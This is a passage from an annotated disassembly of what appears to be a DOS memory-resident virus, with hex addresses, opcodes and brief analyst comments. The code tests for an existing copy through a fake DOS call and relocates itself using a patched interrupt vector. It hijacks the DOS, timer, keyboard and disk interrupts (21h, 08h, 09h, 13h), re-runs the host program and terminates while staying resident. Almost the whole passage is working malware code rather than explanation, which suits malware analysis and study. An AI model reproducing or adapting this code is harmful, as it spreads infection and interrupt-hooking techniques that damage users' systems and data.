0BF2 C6064F0001 MOV [004F],01
0BF7 C70603000100 MOV [0003],0001
0BFD C70610010000 MOV [0110],0000
0C03 C6060F0101 MOV [010F],01
0C08 C6064E0000 MOV [004E],00
0C0D 1F POP DS
0C0E C3 RET
;---------------------------------------------------------------------------
0C0F 1E PUSH DS
0C10 06 PUSH ES
0C11 33C0 XOR AX,AX
0C13 8ED8 MOV DS,AX
0C15 A11304 MOV AX,[0413] ;Memory size in KByte
0C18 B106 MOV CL,06
0C1A D3E0 SHL AX,CL
0C1C 8ED8 MOV DS,AX ;DS = A000 or 9E00
0C1E 33F6 XOR SI,SI
0C20 8B443E MOV AX,[SI+3E]
0C23 3DCB3C CMP AX,3CCB
0C26 7434 JZ 0C5C
0C28 833E400EFE CMP [0E40],FFFE ;(data in Boot Sector)
0C2D 7404 JZ 0C33
0C2F F9 STC
0C30 EB4E JMP 0C80
0C32 90 NOP
0C33 FA CLI
0C34 B8404B MOV AX,4B40 ;Load Or Exec Program
0C37 CD21 INT 21 ; !!! AL = 40 ist false call
0C39 3D7856 CMP AX,5678 ;Error code = 5678 ?
0C3C 741A JZ 0C58 ; Yes - allready loaded
0C3E C6067B0F01 MOV [0F7B],01 ; No - Set "Dos complet" flag
0C43 90 NOP
0C44 FB STI
0C45 B82135 MOV AX,3521 ;Get INT 21 addres
0C48 CD21 INT 21
0C4A 891ED006 MOV [06D0],BX ;Store INT 21 Orig addres
0C4E 8C06D206 MOV [06D2],ES
0C52 BAD406 MOV DX,06D4 ;(? New Offset of INT 21 ?)
0C55 B82125 MOV AX,2521
0C58 F8 CLC
0C59 EB25 JMP 0C80
0C5B 90 NOP
0C5C C7443EFEFF MOV [SI+3E],FFFE
0C61 33C0 XOR AX,AX
0C63 8ED8 MOV DS,AX
0C65 8EC0 MOV ES,AX
0C67 BE0402 MOV SI,0204 ;Set int vector 08 from 81
0C6A BF2000 MOV DI,0020
0C6D B90200 MOV CX,0002
0C70 FA CLI
0C71 F3A5 REP MOVSW
0C73 FB STI
0C74 BE0C02 MOV SI,020C ;Set int vector 13 from 83
0C77 BF4C00 MOV DI,004C
0C7A B90200 MOV CX,0002
0C7D F3A5 REP MOVSW
0C7F F9 STC
0C80 07 POP ES
0C81 1F POP DS
0C82 C3 RET
;---------------------------------------------------------------------------
0C83 E889FF CALL 0C0F
0C86 7203 JC 0C8B
0C88 EB0B JMP 0C95
0C8A 90 NOP
0C8B B8404B MOV AX,4B40 ;Load or Execute Program
0C8E CD21 INT 21 ; !!! AL = 40 ist false call
0C90 3D7856 CMP AX,5678 ;Error code = 5678 ?
0C93 7513 JNZ 0CA8 ; No -
0C95 B8414B MOV AX,4B41 ; Yes -
0C98 BF0001 MOV DI,0100
0C9B 2E8B8D2400 MOV CX,CS:[DI+0024] ;
0CA0 BE0010 MOV SI,1000
0CA3 03F7 ADD SI,DI
0CA5 FC CLD
0CA6 CD21 INT 21 ;
0CA8 8CC8 MOV AX,CS
0CAA 051000 ADD AX,0010
0CAD 8ED0 MOV SS,AX
0CAF BCEE0D MOV SP,0DEE
0CB2 50 PUSH AX
0CB3 B8B80B MOV AX,0BB8
0CB6 50 PUSH AX
0CB7 CB RET Far ;>> Goto 0CB8
;---------------------------------------------------------------------------
0CB8 FC CLD
0CB9 06 PUSH ES
0CBA E852FF CALL 0C0F
0CBD 2E8C062600 MOV CS:[0026],ES
0CC2 2E8C068100 MOV CS:[0081],ES
0CC7 2E8C068500 MOV CS:[0085],ES
0CCC 2E8C068900 MOV CS:[0089],ES
0CD1 8CC0 MOV AX,ES
0CD3 051000 ADD AX,0010
0CD6 2E01065400 ADD CS:[0054],AX
0CDB 2E01065600 ADD CS:[0056],AX
0CE0 B8404B MOV AX,4B40 ;
0CE3 CD21 INT 21 ;
0CE5 3D7856 CMP AX,5678 ;
0CE8 7513 JNZ 0CFD
0CEA 07 POP ES
0CEB 2E8E165600 MOV SS,CS:[0056]
0CF0 2E8B265000 MOV SP,CS:[0050]
0CF5 E89EFE CALL 0B96 ;Zero registers
0CF8 2EFF2E5200 JMP Far CS:[0052]
0CFD E873FE CALL 0B73 ;Decode Text
0D00 E89EFE CALL 0BA1 ;Detect speed of machine
0D03 33C0 XOR AX,AX
0D05 8EC0 MOV ES,AX
0D07 26A1FC03 MOV AX,ES:[03FC] ;Save INT FF Ofs into 0028
0D0B 2EA32800 MOV CS:[0028],AX
0D0F 26A0FE03 MOV AL,ES:[03FE] ;Save INT FF Seg (Lo) into 002A
0D13 2EA22A00 MOV CS:[002A],AL
0D17 26C706FC03F3A5 MOV ES:[03FC],A5F3 ;0000:03FC = F3 A5 -> REP MOVSW
0D1E 26C606FE03CB MOV ES:[03FE],CB ; 03FE = CB -> RET Far
0D24 58 POP AX ; +---+---+
0D25 051000 ADD AX,0010 ;
0D28 8EC0 MOV ES,AX ;
0D2A 0E PUSH CS ; Move from DS:0 to ES:0
0D2B 1F POP DS ; 800 word
0D2C B90010 MOV CX,1000 ;
0D2F D1E9 SHR CX,1 ;
0D31 33F6 XOR SI,SI ;
0D33 8BFE MOV DI,SI ;
0D35 06 PUSH ES ;
0D36 B83F0C MOV AX,0C3F ;
0D39 50 PUSH AX ;
0D3A EAFC030000 JMP 0000:03FC ; +
; |
0D3F 8CC8 MOV AX,CS ; <--+
0D41 8ED0 MOV SS,AX
0D43 BCEE0D MOV SP,0DEE
0D46 33C0 XOR AX,AX
0D48 8ED8 MOV DS,AX
0D4A 2EA12800 MOV AX,CS:[0028] ;Restore INT FF Ofs
0D4E A3FC03 MOV [03FC],AX
0D51 2EA02A00 MOV AL,CS:[002A] ;Restore INT FF Seg (Lo)
0D55 A2FE03 MOV [03FE],AL
0D58 BB0010 MOV BX,1000
0D5B B104 MOV CL,04
0D5D D3EB SHR BX,CL
0D5F 83C340 ADD BX,0040
0D62 B44A MOV AH,4A ;Modify memory allocation
0D64 2E8E062600 MOV ES,CS:[0026]
0D69 CD21 INT 21
0D6B B82135 MOV AX,3521 ;Get INT 21 vector
0D6E CD21 INT 21
0D70 2E891ED006 MOV CS:[06D0],BX ;Store it
0D75 2E8C06D206 MOV CS:[06D2],ES
0D7A 0E PUSH CS
0D7B 1F POP DS
0D7C BAD406 MOV DX,06D4 ;Set INT 21 vector
0D7F B82125 MOV AX,2521
0D82 CD21 INT 21
0D84 8E062600 MOV ES,[0026]
0D88 268E062C00 MOV ES,ES:[002C] ;Segment of DOS ENVRONMENT string
0D8D 33FF XOR DI,DI
0D8F B9FF7F MOV CX,7FFF
0D92 32C0 XOR AL,AL
0D94 F2AE REPNZ SCASB
0D96 263805 CMP ES:[DI],AL
0D99 E0F9 LOOPNZ 0D94
0D9B 8BD7 MOV DX,DI
0D9D 83C203 ADD DX,0003
0DA0 B8004B MOV AX,4B00
0DA3 06 PUSH ES
0DA4 1F POP DS
0DA5 0E PUSH CS
0DA6 07 POP ES
0DA7 BB7D00 MOV BX,007D
0DAA 1E PUSH DS
0DAB 06 PUSH ES
0DAC 50 PUSH AX
0DAD 53 PUSH BX
0DAE 51 PUSH CX
0DAF 52 PUSH DX
0DB0 0E PUSH CS
0DB1 1F POP DS
0DB2 B80835 MOV AX,3508 ;Get INT 08 vector
0DB5 CD21 INT 21
0DB7 891E2103 MOV [0321],BX ;Stor it
0DBB 8C062303 MOV [0323],ES
0DBF BAEC02 MOV DX,02EC ;
0DC2 E80FFE CALL 0BD4
0DC5 B80825 MOV AX,2508 ;Set INT 08
0DC8 CD21 INT 21
0DCA B80935 MOV AX,3509 ;Get INT 09 vector
0DCD CD21 INT 21
0DCF 891E0600 MOV [0006],BX ;Store it
0DD3 8C060800 MOV [0008],ES
0DD7 BAB103 MOV DX,03B1 ;Set INT 09 vector
0DDA B80925 MOV AX,2509
0DDD CD21 INT 21
0DDF B81335 MOV AX,3513 ;Get INT 13 vector
0DE2 CD21 INT 21
0DE4 891E0A00 MOV [000A],BX ;Store it
0DE8 8C060C00 MOV [000C],ES
0DEC BA2605 MOV DX,0526 ;Set INT 13 vector
0DEF B81325 MOV AX,2513
0DF2 CD21 INT 21
0DF4 5A POP DX
0DF5 59 POP CX
0DF6 5B POP BX
0DF7 58 POP AX
0DF8 07 POP ES
0DF9 1F POP DS
0DFA 9C PUSHF
0DFB 2EFF1ED006 CALL Far CS:[06D0]
0E00 1E PUSH DS
0E01 07 POP ES
0E02 B449 MOV AH,49 ;Free allocated memory
0E04 CD21 INT 21
0E06 B44D MOV AH,4D ;Get return code of subprocess
0E08 CD21 INT 21
0E0A B431 MOV AH,31 ;Terminate And Stay Resident
0E0C BA0010 MOV DX,1000
0E0F B104 MOV CL,04
0E11 D3EA SHR DX,CL
0E13 83C240 ADD DX,0040
0E16 CD21 INT 21
;---------------------------------------------------------------------------